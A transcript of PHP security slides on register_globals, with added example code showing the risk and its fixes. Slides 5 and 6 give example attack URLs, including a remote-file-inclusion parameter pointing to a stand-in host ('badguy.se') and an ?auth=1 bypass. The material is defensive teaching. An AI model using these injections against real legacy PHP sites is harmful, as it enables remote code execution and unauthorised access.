PHP Security: register_globals - PowerPoint PPT Presentation

Provided by: PaulJ169
Slides: 13

Transcript and Presenter's Notes
1
PHP Security register_globals
  • How To Make It Difficult For Hackers To Set
    Variables

2
What Is register_globals?
  • A php.ini directive (on/off) that turns environment, GET, POST,
    cookie and server data into ordinary global variables before the
    script runs
  • Cf. variables_order (EGPCS), which sets the order in which those
    sources are registered, and so which source overwrites the others
    when two of them use the same name

3
Examples (Part 1)

  <form>
    <input type="text" name="mytext" />
    <input type="hidden" name="myhide" value="other" />
  </form>

With register_globals turned on, PHP will automatically create the
variables $mytext and $myhide and populate them with the values
submitted by the form (whether GET or POST).
4
Examples (Part 2)
  • Similarly, with the URL
  • http://example.com/index.php?george=jungle
  • PHP will create $george for you and give it the
    value jungle.
  • Cookie, server, and environment variables such as
    DOCUMENT_ROOT and PHP_SELF are also
    automatically created and populated.
  • You don't know where a value came from: any of the
    EGPCS sources could have set it, and a later source
    silently overwrites an earlier one of the same name.

5
Problems (Part 1)

  <?php
  // some code
  include "$libdir/functions.inc";
  // more code
  ?>

If the script relies on $libdir being set elsewhere (a config file it
did not actually include on this code path, or nothing at all), a user
can supply it in the URL. With register_globals on, the value is
registered before the first line of the script runs, so the include
fetches whatever the attacker names. This is remote file inclusion,
i.e. execution of attacker-supplied PHP on your server, which is worse
than cross-site scripting. (If the script unconditionally assigns
$libdir before the include, the injected value is overwritten; the
danger is every path where it is not.)
E.g. http://example.com/index.php?libdir=http://badguy.se/hack
6
Problems (Part 2)

  <?php
  if ($auth == 1) {
      // do stuff for authorized users
  } else {
      echo "Not authorized!";
  }
  ?>

If the script never assigns $auth itself on this path (it is only set
after a successful login), a user can set it in the URL and the check
passes, allowing unauthenticated use.
E.g. http://example.com/index.php?auth=1
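The two "Problems" slides can be reproduced on a current PHP, where the directive no longer exists, by emulating what register_globals did: copying every request key into a global variable before the script's own logic runs. The block below is an added example, not code from the original slides; the request contents, the host badguy.se and the path functions.inc are constructed for illustration.

```php
<?php
// Added example (not part of the original slides): emulate register_globals
// so the auth bypass and the libdir injection can be observed on modern PHP.

// Constructed request: the attacker requested
//   index.php?auth=1&libdir=http://badguy.se/hack
$_GET = ['auth' => '1', 'libdir' => 'http://badguy.se/hack'];

// This is what register_globals did: every EGPCS key became a global
// variable, registered before a single line of the script executed.
extract($_GET, EXTR_OVERWRITE);

// Slide 6: the script never assigns $auth itself, so the injected "1"
// survives to the comparison, and the loose == turns "1" into 1.
if ($auth == 1) {
    echo "Doing privileged work: the check was bypassed\n";
} else {
    echo "Not authorized!\n";
}

// Slide 5: the script expected $libdir to come from a config file that was
// never included on this path. We only print the path the include would
// resolve to; on an old PHP with allow_url_fopen/allow_url_include on,
// include "$libdir/functions.inc" would fetch and execute the remote file.
$path = "$libdir/functions.inc";
echo "include would resolve to: $path\n";

// Contrast: if the script had assigned $libdir itself, the registered
// value would simply be overwritten and the injection would fail.
$libdir = '/var/www/app/lib';
echo "after the script's own assignment: $libdir/functions.inc\n";
```

Run it from the command line; the first two lines of output are the bypass and the attacker-controlled include path, the last line shows why an unconditional assignment defuses the libdir case but not the auth case, which has no "safe" default assignment at all unless you write one.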
7
Solutions (Part 1)
  • Don't let anyone see your code
  • If they don't know what variables to set, they
    can't crack your script!
  • Security-through-obscurity
  • Does not work well, if at all: variable names are
    guessable, and leak through error messages and
    shared or reused code
  • Check all variables before using them
  • Good practice anyway
  • Sometimes hard to check (e.g., $auth: unless it is
    initialised to false before the test, the injected
    value stands)

8
Solutions (Part 2)
  • Turn off register_globals!
  • Off by default in PHP 4.2.0 and later anyway
    (deprecated in PHP 5.3.0, removed in PHP 5.4.0)
  • Use the track_vars arrays instead
  • $_GET
  • $_POST
  • $_SERVER
  • $_FILES
  • $_ENV
  • $_COOKIE
  • track_vars is always on in PHP 4.0.3 and later; the
    $_GET-style superglobals above replaced the older
    $HTTP_GET_VARS-style arrays in PHP 4.1.0

9
Solution Examples (Part 1)

  <form method="post">
    <input type="text" name="mytext" />
    <input type="hidden" name="myhide" value="other" />
  </form>

With register_globals turned off, PHP will populate
$_POST['mytext'] and $_POST['myhide']. If the
method was GET, the values are in $_GET.
10
Solution Examples (Part 2)
If a value is set in the URL http://example.com/index.php?george=jungle
it becomes $_GET['george'] = 'jungle'.
  • Post-method variables are in $_POST
  • Get-method and URL variables are in $_GET
  • Server variables are in $_SERVER
  • Uploaded files are in $_FILES
  • Cookie values in $_COOKIE
  • Environment settings in $_ENV
You know exactly where each value came from.
11
Use define For Path Names
  • If you have to set directory paths in
    variables, use constants instead
  • define('LIBDIR', '/path/to/lib');
  • Pathnames are especially dangerous in variables
    since they feed include/require, so an injected
    value leads directly to local or remote file
    inclusion, i.e. running attacker-chosen code
  • Once set, constants cannot be redefined (a second
    define() of the same name fails and the first value
    stands), and no request source can create one,
    making them far more robust against accidental or
    unexpected value resets and hack attempts
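Putting slides 8 to 11 together, the same two cases rewritten so that no request parameter can reach the include path or the authorisation check: input is read only from the explicit superglobals, the library directory is a constant, the file name is matched against an allow list, and the authorisation flag lives in server-side state that is initialised before it is tested. This is an added example, not code from the original slides; the directory /var/www/app/lib, the allow list, and the request and session contents are constructed for illustration.

```php
<?php
// Added example (not part of the original slides): the hardened counterpart
// of the "Problems" slides, using $_GET explicitly, define() for the path,
// and a server-side session for the authorisation state.

// 1. On a PHP old enough to still have the directive, refuse to run with it
//    on. On PHP >= 5.4 ini_get() returns false for the unknown name, which
//    FILTER_VALIDATE_BOOLEAN treats as off.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    die("register_globals is enabled; refusing to run.\n");
}

// 2. Library directory as a constant (slide 11). A constant cannot be
//    redefined, and nothing in EGPCS can create one. Constructed path.
define('LIBDIR', '/var/www/app/lib');

// 3. The caller may choose *which* library, but only from a fixed list,
//    and the chosen name is never concatenated into the path unchecked.
function libraryFile(string $requested): string
{
    $allowed = ['functions', 'db', 'mail'];   // constructed allow list
    if (!in_array($requested, $allowed, true)) {
        $requested = 'functions';             // safe default, not an error page
    }
    return LIBDIR . '/' . $requested . '.inc';
}

// 4. Authorisation comes from the session, which only a successful login
//    writes to, and the flag is tested with === against a real boolean so a
//    string "1" from anywhere cannot satisfy it.
function isAuthorized(array $session): bool
{
    return isset($session['auth']) && $session['auth'] === true;
}

// Constructed request repeating the attack from slides 5 and 6, plus a
// legitimate "lib" parameter. Origin is explicit: it is $_GET, nothing else.
$_GET = ['auth' => '1', 'libdir' => 'http://badguy.se/hack', 'lib' => 'db'];
$session = [];   // fresh, unauthenticated session; in a real app use $_SESSION

echo libraryFile($_GET['lib'] ?? ''), "\n";       // /var/www/app/lib/db.inc
echo libraryFile($_GET['libdir']), "\n";         // /var/www/app/lib/functions.inc
echo isAuthorized($session) ? "authorized\n" : "Not authorized!\n";

// The injected auth and libdir values are still present in $_GET, but no
// code path ever reads them as $auth or $libdir, so they are inert.
```

Note the design choice in step 3: rather than validating the path the user sends, the code never lets the user send a path at all; a name is mapped onto a path the code owns. That removes the whole class of "../" and "http://" tricks instead of trying to enumerate them.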

12
References
  • http://www.php.net/manual/en/security.registerglobals.php
  • http://www.php.net/manual/en/security.php
  • http://www.zend.com/zend/art/art-oertli.php
  • http://www.securereality.com.au/studyinscarlet.txt